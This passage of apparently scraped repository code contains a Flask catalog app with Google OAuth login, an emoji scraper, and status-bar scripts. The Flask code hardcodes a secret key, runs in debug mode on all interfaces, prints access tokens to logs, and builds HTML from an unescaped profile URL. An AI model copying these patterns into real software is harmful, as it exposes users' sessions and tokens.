cannot access some app features.\n if 'username' not in login_session:\n return render_template(\n 'publiccategories.html',\n categories=categories,\n items=items)\n else:\n return render_template(\n 'categories.html',\n categories=categories,\n items=items)\n\n# Create a new category\n\n\[email protected]('/category/new', methods=['GET', 'POST'])\ndef newCategory():\n \"\"\"Render the html page for creating a new category in the catalog.\"\"\"\n # Check to see if the user is allowed to create a new category.\n if 'username' not in login_session:\n return redirect('/login')\n # POST request allows us to modify our database.\n if request.method == 'POST':\n newCategory = Category(category_name=request.form['name'],\n user_id=login_session['user_id'])\n session.add(newCategory)\n # Create the new category here.\n session.commit()\n flash('New Category Successfully Created')\n return redirect(url_for('main_page'))\n else:\n # GET Request for the html that contains the form for\n # creating a new category.\n return render_template('newCategory.html')\n\n\n# Create a new item in a category\n\[email protected]('/category/new/item', methods=['GET', 'POST'])\ndef newItem():\n \"\"\"This function renders the page for creating a new item in a category.\"\"\"\n\n # Check to see if the user is logged in.\n if 'username' not in login_session:\n return redirect('login')\n # POST request allows us to modify our database.\n if request.method == 'POST':\n # Gather the information from the form.\n newItem = CategoryItem(item_name=request.form['name'],\n description=request.form['description'],\n category_id=request.form['categories'],\n user_id=login_session['user_id'])\n session.add(newItem)\n # Add the new item to the database.\n session.commit()\n flash('New Item Successfully Created')\n return redirect(url_for('main_page'))\n else:\n # Query for all the categories users can select\n categories = session.query(Category).all()\n # Return the html that contains the form for creating a new item.\n # Pass in the variable categories that the form needs to complete\n # its job.\n return render_template('newItem.html', categories=categories)\n\n\n# Get all the items in a category\n\[email protected]('/catalog/<string:category>/items')\ndef get_items(category):\n \"\"\"Get the items in a category and render the correct template based\n on the end-user's login status.\n\n Keyword Arguments:\n category(str): A string representation of the category name.\n \"\"\"\n # Query for all the categories users can select\n categories = session.query(Category).all()\n\n # Query for the category the user selected either by clicking or by url.\n selected_category = session.query(\n Category).filter_by(category_name=category).one()\n\n # Query for all the items that are associated with a category.\n selected_category_items = session.query(\n CategoryItem).filter_by(category_id=selected_category.id).all()\n # Render the template if the user is not logged in.\n if 'username' not in login_session:\n return render_template('publicitems.html', categories=categories,\n selected_category=selected_category,\n selected_category_items=selected_category_items)\n else:\n # Render the template if the user is logged in.\n return render_template('privateitems.html', categories=categories,\n selected_category=selected_category,\n selected_category_items=selected_category_items)\n\n\n# Get the description of an item in a category.\n\[email protected]('/catalog/<string:category>/<string:item>/')\ndef get_items_description(category, item):\n \"\"\"Render the template for getting an item's description that belongs to\n a category. If the user is logged in and is authorized they can edit\n descriptions or delete the item entirely.\n\n Keyword Arguments:\n category(str): A string representation of the category name.\n item(str): A string representation of the item name.\n \"\"\"\n selected_item = session.query(CategoryItem).filter_by(item_name=item).one()\n authorized_user = session.query(User).filter_by(\n id=selected_item.user_id).one()\n # Check to see if the user is logged in.\n if 'username' in login_session:\n username = login_session['username']\n else:\n username = None\n # Render the private template. The user who is logged in and\n # is authorized to edit and delete is provide links to do so\n # in this template.\n if 'username' in login_session and username == authorized_user.name:\n return render_template(\n 'privateItemDescription.html',\n category=category,\n item=item,\n selected_item=selected_item)\n else:\n # Render the public template. Users who are not logged in cannot edit\n # item descriptions or delete items.\n return render_template(\n 'publicItemDescription.html',\n category=category,\n item=item,\n selected_item=selected_item)\n\n\n# Edit an item in a catalog.\n\[email protected](\n '/catalog/<string:category>/<string:item>/edit',\n methods=[\n 'GET',\n 'POST'])\ndef editCategoryItem(category, item):\n \"\"\"This function allows the user to edit a item in a category.\n\n Keyword Arguments:\n category(str): A string representation of the category name.\n item(str): A string representation of the item name.\n \"\"\"\n if 'username' not in login_session:\n return redirect('/login')\n elif 'username' in login_session:\n username = login_session['username']\n else:\n username = None\n categories = session.query(Category).all()\n # Item to be edited.\n edited_item = session.query(CategoryItem).filter_by(item_name=item).one()\n # Query for the user who is authorized to perform edits.\n authorized_user = session.query(User).filter_by(\n id=edited_item.user_id).one()\n if username != authorized_user.name:\n # Tell the user they are not allowed to edit items in this catalog.\n return \"\"\"<script>function myFunction()\n {alert('You are not authorized to edit items in this catalog.\n Please create your own catalog in order to edit items.');}</script>\n <body onload='myFunction()''>\"\"\"\n if request.method == 'POST':\n # Take the information from the form and update the record in the\n # database.\n if request.form['name']:\n edited_item.item_name = request.form['name']\n if request.form['description']:\n edited_item.description = request.form['description']\n if request.form['category']:\n edited_item.category_id = request.form['category']\n session.add(edited_item)\n # Commit the changes to the database.\n session.commit()\n flash('Category Item Successfully Edited')\n return redirect(url_for('main_page'))\n else:\n # Render the template that contains the form for editing an item.\n # Pass in the variables that the template needs to complete its job.\n return render_template(\n 'editItem.html',\n categories=categories,\n item=item)\n\n\[email protected](\n '/catalog/<string:category>/<string:item>/delete',\n methods=[\n 'GET',\n 'POST'])\ndef deleteCategoryItem(category, item):\n \"\"\"This function allows the user to delete a item in a category.\n\n Keyword Arguments:\n category(str): A string representation of the category name.\n item(str): A string representation of the item name.\n \"\"\"\n if 'username' not in login_session:\n return redirect('/login')\n elif 'username' in login_session:\n username = login_session['username']\n else:\n username = None\n # Query for the item that is to be deleted.\n itemToDelete = session.query(CategoryItem).filter_by(item_name=item).one()\n # Query for the user who is authorized to perform deletions.\n authorized_user = session.query(User).filter_by(\n id=itemToDelete.user_id).one()\n if username != authorized_user.name:\n return \"\"\"<script>function myFunction()\n {alert('You are not authorized to delete items in this catalog.\n Please create your own catalog in order to delete items.');}</script>\n <body onload='myFunction()''>\"\"\"\n if request.method == 'POST':\n session.delete(itemToDelete)\n session.commit()\n flash('Category Item Successfully Deleted')\n return redirect(url_for('main_page'))\n else:\n return render_template('deleteItem.html', item=item)\n\n\[email protected]('/gconnect', methods=['POST'])\ndef gconnect():\n \"\"\"Taken from Udacity, this function allows us to provide sign in with\n google.\"\"\"\n\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n print \"Token's client ID does not match app's.\"\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # see if user exists, if it doesn't make a new one\n user_id = getUserID(data[\"email\"])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n output = ''\n output += '<h1>Welcome, '\n output += login_session['username']\n output += '!</h1>'\n output += '<img src=\"'\n output += login_session['picture']\n # Over line limit, but should pass since it is Udacity code.\n output += \"\"\" style = \"width: 300px; height: 300px;border-radius: 150px;-webkit-border-radius: 150px;-moz-border-radius: 150px;\"> \"\"\"\n flash(\"you are now logged in as %s\" % login_session['username'])\n print \"done!\"\n return output\n\n\[email protected]('/gdisconnect')\ndef gdisconnect():\n \"\"\"Udacity code for disconnecting a user from google sign-in.\"\"\"\n access_token = login_session.get('access_token')\n if access_token is None:\n print 'Access Token is None'\n response = make_response(json.dumps(\n 'Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n print 'In gdisconnect access token is %s', access_token\n print 'User name is: '\n print login_session['username']\n # Over the line character limit but should pass because this is Udacity\n # code.\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % login_session['access_token']\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n print 'result is '\n print result\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n # Over the line character limit but should pass because this is Udacity\n # code.\n response = make_response(json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n# Helper functions.\n\n\ndef getUserID(email):\n \"\"\"Returns a user id.\n Keyword Arguments:\n email(str): a string representation of an email address.\n \"\"\"\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except BaseException:\n return None\n\n\ndef getUserInfo(user_id):\n \"\"\"Return a user object.\n\n Keyword Arguments:\n user_id(int): An integer representation of a user_id.\n \"\"\"\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef createUser(login_session):\n \"\"\"Creates a new user and returns their user_id.\n\n Keyword Arguments:\n login_session(obj): A login session object.\n \"\"\"\n # Create a new user from the login_session object.\n newUser = User(\n name=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n # Add the user to the database.\n session.add(newUser)\n # Commit the changes.\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\nif __name__ == '__main__':\n app.debug = True\n app.secret_key = 'super_secret_key'\n app.run(host='0.0.0.0', port=8000)\n" }, { "alpha_fraction": 0.479082316160202, "alphanum_fraction": 0.4851551949977875, "avg_line_length": 31.2391300201416, "blob_id": "c5f0e8698328e76cbedae910af0e003af7d1db07", "content_id": "49492e18cc608159f5941fa85fe73e0920a40a07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 115, "num_lines": 46, "path": "/catalog/templates/categories.html", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\n <link rel=\"stylesheet\" href=\"/static/styles.css\">\n <link href=\"https://fonts.googleapis.com/css?family=Roboto\" rel=\"stylesheet\">\n <title>Catalog App</title>\n</head>\n\n<body>\n <div class=\"header\">\n <h1 class=\"title\">Catalog App</h1>\n <button id=\"logoutbutton\" class=\"loginButton\">Logout</button>\n <script src=\"static/logoutscript.js\"></script>\n </div>\n <div class=\"bodyContentContainer\">\n <div class=\"leftColumn\">\n <span><a href=\"{{url_for('newCategory')}}\">Add Category</a></span>\n <h2>Categories</h2>\n <div>\n <ul>\n {% for i in categories %}\n <li><a href=\"{{url_for('get_items', category = i.category_name)}}\">{{i.category_name}}</a></li>\n {% endfor %}\n </ul>\n </div>\n </div>\n <div class=\"verticalLine\"></div>\n <div class=\"rightColumn\">\n <span><a href=\"{{url_for('newItem')}}\">Add Item</a></span>\n <h2>Latest Items</h2>\n <div>\n <ul>\n {% for i in items %}\n <li>{{i.item_name}}</li>\n {% endfor %}\n </ul>\n </div>\n </div>\n </div>\n</body>\n\n</html>" } ]
3
nucle0tides/emoji-scraper
https://github.com/nucle0tides/emoji-scraper
0e7c49462b57e95e541fd5fc5c3214c8918fb129
dd6462f11d84a77b1b982073933f40ac71704bd1
8816acfe4712b57dbcf835a14082d0d9e06d7639
refs/heads/master
2021-01-11T10:38:39.306107
2017-02-25T03:27:29
2017-02-25T03:27:29
72,954,970
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5256167054176331, "alphanum_fraction": 0.5303605198860168, "avg_line_length": 32.4603157043457, "blob_id": "a4aa06c911ad387ee922719d96664cc2f67a39f8", "content_id": "e002d6bf2a5993a0ff6382c4e4cffbc2093d17ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2108, "license_type": "no_license", "max_line_length": 106, "num_lines": 63, "path": "/emoji-scraper.py", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport urllib.request\nimport os\nimport sqlite3\n\n\nclass EmojiScraper(object):\n def __init__(self, url):\n self.url = url \n self.soup = None\n\n def get_soup(self): \n page = requests.get(self.url)\n self.soup = bs(page.text, \"html.parser\")\n\n def get_emoji_table(self): \n return self.soup.find(\"table\").find_all(\"tr\")\n\n def get_emoji_url(self, cell):\n return cell.find(\"img\")[\"src\"]\n\n def get_emoji_attr(self, cell):\n return cell.getText()\n\n def download_images(self, emoji_table):\n conn = sqlite3.connect('database.db')\n print(conn)\n c = conn.cursor()\n for row in emoji_table[1::]:\n cells = row.find_all(\"td\")\n try:\n name = self.get_emoji_attr(cells[16])\n categories = self.get_emoji_attr(cells[18]).split(' | ')\n #print(categories)\n if ':' in name:\n name = name.replace(':', '')\n url = self.get_emoji_url(cells[5])\n c.execute(\"INSERT INTO emojis (name, url) VALUES (? , ?)\", (name, url))\n for cat in categories:\n #print(cat)\n c.execute(\"INSERT INTO categories (emoji_name, category) VALUES (? , ?)\", (name, cat))\n #print(url)\n urllib.request.urlretrieve(url, \"emojis/\" + name + \".png\")\n except Exception as e:\n # I know this is /bad/ but\n # likely an index out of range exception\n # meaning there is no image or it's a row we don't need\n # print error to be certain\n print(e)\n pass\n conn.commit() \n\n\nif __name__ == \"__main__\": \n Scraper = EmojiScraper(\"http://unicode.org/emoji/charts/full-emoji-list.html\")\n Scraper.get_soup() \n table = Scraper.get_emoji_table()\n print(os.path.exists('emojis'))\n if not os.path.exists('emojis'):\n os.makedirs('emojis') \n Scraper.download_images(table)\n" }, { "alpha_fraction": 0.7659574747085571, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 22, "blob_id": "3d2c18cb1920fc31ed33f4c48cf35e5dd2928166", "content_id": "05fa4f85f285ca52c77ec89869a83b37857f9d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 29, "num_lines": 2, "path": "/README.md", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "# emoji-scraper\nAn emoji scraper, for science \n" }, { "alpha_fraction": 0.7534246444702148, "alphanum_fraction": 0.7534246444702148, "avg_line_length": 21.538461685180664, "blob_id": "c0175e45df08b6ef9368ab8d10dc4dfb10cf119a", "content_id": "fcc909d30601c7201d3b45f00f0d5ca3513b6021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 292, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/schema.sql", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "drop table if exists emojis;\ncreate table emojis (\n id integer primary key autoincrement,\n name text not null,\n url text not null\n);\n\ndrop table if exists categories;\ncreate table categories (\n id integer primary key autoincrement,\n emoji_name text not null,\n category text not null \n);" } ]
3
abbafei/status-info-maker
https://github.com/abbafei/status-info-maker
7b7b79c53995040f6ad4885c2ad0afed7e6f421b
cf40324f4b3d671dc4164bfdc4104c03c4f013ca
2759e4be8b5f0b029bc5089d8166b13b20be4b73
refs/heads/master
2016-09-05T11:30:43.202074
2013-07-14T10:20:36
2013-07-14T10:20:36
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7372881174087524, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 38.33333206176758, "blob_id": "d21e1065abdb3a707f369d94f02cbc37f1cb4505", "content_id": "c25a8a1e4e2fed1ed59b52ea09dd99dcfe09dc39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 124, "num_lines": 9, "path": "/processors/repeat.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''repeat what was provided standard input the specified amount of times, or indefinitely if amount of times is not given'''\nimport sys\nimport itertools\nimport util\n\ninp = sys.stdin.read()\ntimes = int(sys.argv[1] if (len(sys.argv) > 1) else 0)\nutil.fifo_handler(itertools.islice(itertools.repeat(inp), (times or None)), sys.stdout)\n" }, { "alpha_fraction": 0.7115987539291382, "alphanum_fraction": 0.7115987539291382, "avg_line_length": 21.785715103149414, "blob_id": "6b3e47054c561545df02c0849ea55a0273891283", "content_id": "3485bca4e3a88ee2f4186812d365f42a614ada55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 155, "num_lines": 14, "path": "/processors/format.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#formats items as array of dicts\nimport sys\nimport util\nimport run\n\ndict_actions={\n 'text': None,\n 'cmd': None,\n 'color': None,\n}\n\n\nutil.fifo_handler(run.jsondumpize(run.denewlineize(run.actize(run.dictize(i), dict_actions=dict_actions)) for i in run.jsonloadize(sys.stdin)), sys.stdout)\n" }, { "alpha_fraction": 0.458737850189209, "alphanum_fraction": 0.458737850189209, "avg_line_length": 24.75, "blob_id": "3551257b7f07feaf06e754333281edee7f837d24", "content_id": "8ba1aa566cdbb504a6f6b16f9a4f297834dfae70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 72, "num_lines": 16, "path": "/outputs/xmobar.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\nutil.outputter(\n lambda line: ''.join((\n '}{',\n util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('$', '$$'),\n colorer=lambda c, s: ''.join(('<fc=', c, '>', s, '</fc>')),\n connector=' | ',\n quote_connectors=False,\n )\n ))\n)\n" }, { "alpha_fraction": 0.5822222232818604, "alphanum_fraction": 0.5866666436195374, "avg_line_length": 74, "blob_id": "288473e7c7155b0348d2211838d992a2d8143be9", "content_id": "16e590d3f146f1fb41f2f7b2bf4753558bcac47c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 229, "num_lines": 6, "path": "/outputs/i3bar.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\ncmder=lambda inp: json.dumps(filter(lambda a: a != {} and 'full_text' in a, (dict((('full_text', v.strip()) if k == 'text' else (k,v)) for k,v in d.iteritems() if v.strip() != '') for d in json.loads(inp))), separators=(',',':'))\nutil.outputter(lambda line: ''.join((',', cmder(line), '\\n')), do_b4=lambda inp: (''.join(('{\"version\":1}\\n[\\n', cmder(inp.next()), '\\n')),), do_after=lambda inp: (']\\n',))\n" }, { "alpha_fraction": 0.5055679082870483, "alphanum_fraction": 0.5456570386886597, "avg_line_length": 73.83333587646484, "blob_id": "b770b5151b98b98cfc9863058d70fa5548930f58", "content_id": "efe24dff3e1a1f786194be0ee23d47db0e96c12b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 263, "num_lines": 6, "path": "/demos/run.sh", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# uses hebcal <http://danny.sadinoff.com/hebcal/>\ndidir=\"$1\"\necho \"$(printf '[{\"cmd\": \"acpi -b\", \"color\":\"#613770\"}, \" \", {\"cmd\": \"hebcal -T | head -1\", \"color\": \"#0770ff\"}, \" \", {\"cmd\": \"date +%%a\", \"color\": \"#07ff70\"}, \" \", \" \", {\"cmd\": \"date '; printf \"'+%%I:%%M:%%S %%p'\"; printf '\",\"color\": \"#ffffff\"}]'; printf '')\" | \n\t$didir/processors/repeat.py | $didir/processors/wait.py 1 | \n\t$didir/processors/run.py | $didir/outputs/i3bar.py\n" }, { "alpha_fraction": 0.577636182308197, "alphanum_fraction": 0.5845886468887329, "avg_line_length": 30.381818771362305, "blob_id": "e9170cff554dfcbc84948187d30374f9ee3259b1", "content_id": "52cb74358fa582ed34196e187b0b56066021c316", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1726, "license_type": "no_license", "max_line_length": 128, "num_lines": 55, "path": "/util.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\nimport json\nimport itertools\n\n\n\n\ndef connect_dicts(item, connector=' | ', quoter=lambda text: text, colorer=lambda color, text: text, quote_connectors=True):\n _format_t = lambda t: (lambda pqt: (colorer(t['color'], pqt) if ('color' in t) else pqt))(quoter(t['text']))\n dicts = (_format_t(t) for t in item)\n si = (quoter(connector) if quote_connectors else connector).join(dicts)\n return ''.join((si, \"\\n\"))\n\n\ndef writer_fd(fd):\n def _writer(data):\n fd.write(data)\n fd.flush()\n return _writer\n\n\ndef loopy(inp=iter(sys.stdin.readline, ''), outp=writer_fd(sys.stdout), each_fn=None, b4_fn=None, after_fn=None):\n do_b4 = ((lambda i: ()) if (b4_fn is None) else b4_fn)\n do_each = ((lambda item: ()) if (each_fn is None) else each_fn)\n do_after = ((lambda i: ()) if (after_fn is None) else after_fn)\n for o in itertools.chain(do_b4(inp), itertools.chain.from_iterable(do_each(item) for item in inp), do_after(inp)):\n outp(o)\n\n\ndef outputter(outp_gen=lambda item: item, inp_iter=iter(sys.stdin.readline, ''), outp_fd=sys.stdout, do_b4=None, do_after=None):\n w = writer_fd(outp_fd)\n return loopy(\n inp_iter,\n w,\n b4_fn=do_b4,\n after_fn=do_after,\n each_fn=lambda item: (outp_gen(item),),\n )\n\n\ndef fifo_handler(inp, outp, b4_fn=lambda i: (), after_fn=lambda i: ()):\n write = writer_fd(outp)\n for item in inp:\n for i in b4_fn(item):\n write(i)\n try:\n write(item)\n except IOError as err:\n if err.errno == 32: # Unix: EPIPE Broken Pipe\n break\n else:\n raise\n for i in after_fn(item):\n write(i)\n" }, { "alpha_fraction": 0.6755852699279785, "alphanum_fraction": 0.6856187582015991, "avg_line_length": 41.71428680419922, "blob_id": "d967abff609fc3389ecafaba1f9a5bbd68908a3b", "content_id": "b930eaddf4d3817572998541b4b2d52a936e31ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 129, "num_lines": 7, "path": "/processors/join.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''wait the specified amount of time (in seconds), default 1'''\nimport sys\nimport util\n\njoin_with = (sys.argv[1] if (len(sys.argv) > 1) else None)\nutil.fifo_handler(iter(sys.stdin.readline, ''), sys.stdout, after_fn=lambda i: ((join_with,) if (join_with is not None) else ()))\n" }, { "alpha_fraction": 0.7572901248931885, "alphanum_fraction": 0.7631811499595642, "avg_line_length": 66.9000015258789, "blob_id": "9f3a500bce18d9ac2803e04051533a83b47a7a32", "content_id": "6a7ff909db7b475a038d7462b6a75112adae107e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 3395, "license_type": "no_license", "max_line_length": 193, "num_lines": 50, "path": "/Readme.txt", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "B\"H\n\n\nA modular, flexible status line maker.\n\nMany status line generators (e.g. i3status, conky, etc.) try to get all the info for the status-bar within one process.\nThis saves lots of resources. However, it also severely limits what can be included in the bar; you can only use what the author adds in.\nTherefore, this utility aims to be flexible and modular, and does about *everything* with separate processes. It takes a little more computing power.\nSmall overhead is also an aim, however, this is only true when it does not limit flexibility much.\n\nSummary:\n\tTools to work with streams of JSON objects specifying text to show, and optionally the colors to show it in.\n\tThe stream format is: JSON arrays, one per line. The arrays contain objects with a \"text\" entry and an optional \"color\" entry.\n\tThe inputs can be in other formats, to be processed by 'processors', as long as there is only one item per line.\n\tThe scripts in 'processors' take input streams and manipulate 1)the items contained therein, 2)the way the items are combined.\n\tThe scripts in 'outputs' take a properly-formatted input stream, or a processed stream, and output the information contained therein.\n\nWintry:\n\tJSON is used to pass data around, and functionality is split up on a CPU-process level (i.e. each utility is a process).\n\tThere are three parts, at present:\n\t\t- input: provided by the user in JSON form.\n\t\t- processors: transform input (processed or original)\n\t\t- outputs: transform input data from JSON into external formats\n\n\tAll these parts either take, give, or both, one or more line(s) of arbitrary JSON arrays, one array per line. (Since newlines in JSON are encoded as \"\\n\", any amount of JSON can be on a line).\n\t*These formats may change in future versions of this code.*\n\tInput format\n\t\tThe input JSON arrays should contain zero or more strings and/or objects (maps).\n\t\tInput strings are shorthand for a map with a \"text\" item containing the string's value.\n\t\tInput maps have\n\t\t\t(1) either a \"text\" item, whose value is of the string type, or a \"cmd\" item, whose value is a shell command string\n\t\t\t(2) optional \"color\" item, which is a string containing a regular 6-hexadecimal-digit color code preceded by a \"#\" (e.g. #770613).\n\tProcessor format\n\t\tCan be arbitrary values, as long as the lines they give *to an output* are in the expected format.\n\t\t(Usually it will be either in input format or in output format. \"run\" is the processing utility which transforms from input to output.)\n\tOutput format\n\t\tSame as input format, however only maps are valid, and they contain only a \"text\" item, and optionally a \"color\" item too.\n\n\tGenerally, the output destination determines the way the input and processors are to be used.\n\tThese are generally 2 types of destination:\n\t\t1. takes a stream of status lines, updating its display with new lines when they are read.\n\t\t2. takes a command to run, and an amount of time to pause between each invocation of the command.\n\tIn (1), therefore, you usually want to supply them with a stream of lines, generating new ones at an interval. The 'repeat' and 'wait' processors are very useful for this purpose.\n\tIn (2), you usually want to supply the command to make only one line; the line is then updated when destination *reruns* the command.\n\nThis code was inspired by:\n\t- i3 \"i3status\" and \"i3bar\" utilities\n\t- Python WSGI specification\n\nCurrently licensed BSD.\n" }, { "alpha_fraction": 0.6214689016342163, "alphanum_fraction": 0.6214689016342163, "avg_line_length": 18.66666603088379, "blob_id": "4a47ddf04000eb5e1cb51b9437ef2688c655f65b", "content_id": "d89f0636139dd2b66af24143263cd2c13ae07fcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/outputs/text.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n )\n)\n" }, { "alpha_fraction": 0.6628820896148682, "alphanum_fraction": 0.663755476474762, "avg_line_length": 51.04545593261719, "blob_id": "0624a2024b3a02b2a2e059b3e37456d89bb58765", "content_id": "417828f0774eabef3a3fb2b5d05dfc1778e02f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1145, "license_type": "no_license", "max_line_length": 215, "num_lines": 22, "path": "/processors/run.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''runs the cmds in the json objects and outputs them as text'''\nimport subprocess\nimport json\nimport sys\n\ndefault_dict_actions={\n 'text': None,\n 'cmd': lambda i: {'text': subprocess.Popen(i['cmd'], shell=True, stdout=subprocess.PIPE).communicate()[0]},\n 'color': None,\n}\ncombine_dicts = lambda xs: dict((k, v) for d in xs for k, v in d.iteritems())\n\ndictize = lambda a: ((i if isinstance(i, dict) else {'text': (i if isinstance(i, basestring) else str(i))}) for i in a)\nactize = lambda t, dict_actions=None: (combine_dicts((({n: d[n]} if a is None else a(d)) if n in d else {}) for n, a in (dict_actions if (dict_actions is not None) else default_dict_actions).iteritems()) for d in t)\ndenewlineize=lambda t: (dict(((k, v.rstrip('\\r\\n')) if k == 'text' else (k,v)) for k,v in d.iteritems()) for d in t)\njsonloadize=lambda inp_fd: (json.loads(i) for i in iter(inp_fd.readline, ''))\njsondumpize=lambda ts: (''.join((json.dumps(tuple(t)), \"\\n\")) for t in ts)\nif __name__ == '__main__':\n import util\n\n util.fifo_handler(jsondumpize(denewlineize(actize(dictize(i))) for i in jsonloadize(sys.stdin)), sys.stdout)\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 31.399999618530273, "blob_id": "1b459e036a16d18e058d3231e14bc13dbe9bfcbc", "content_id": "5e9153b0ef156a1dd6569bfe9e4ba3b98fdd5524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 486, "license_type": "no_license", "max_line_length": 86, "num_lines": 15, "path": "/outputs/html.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# can be used with, among many options, with XMLHTTPRequest multipart push\nimport json\nimport cgi\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: cgi.escape(s),\n colorer=lambda c, s: 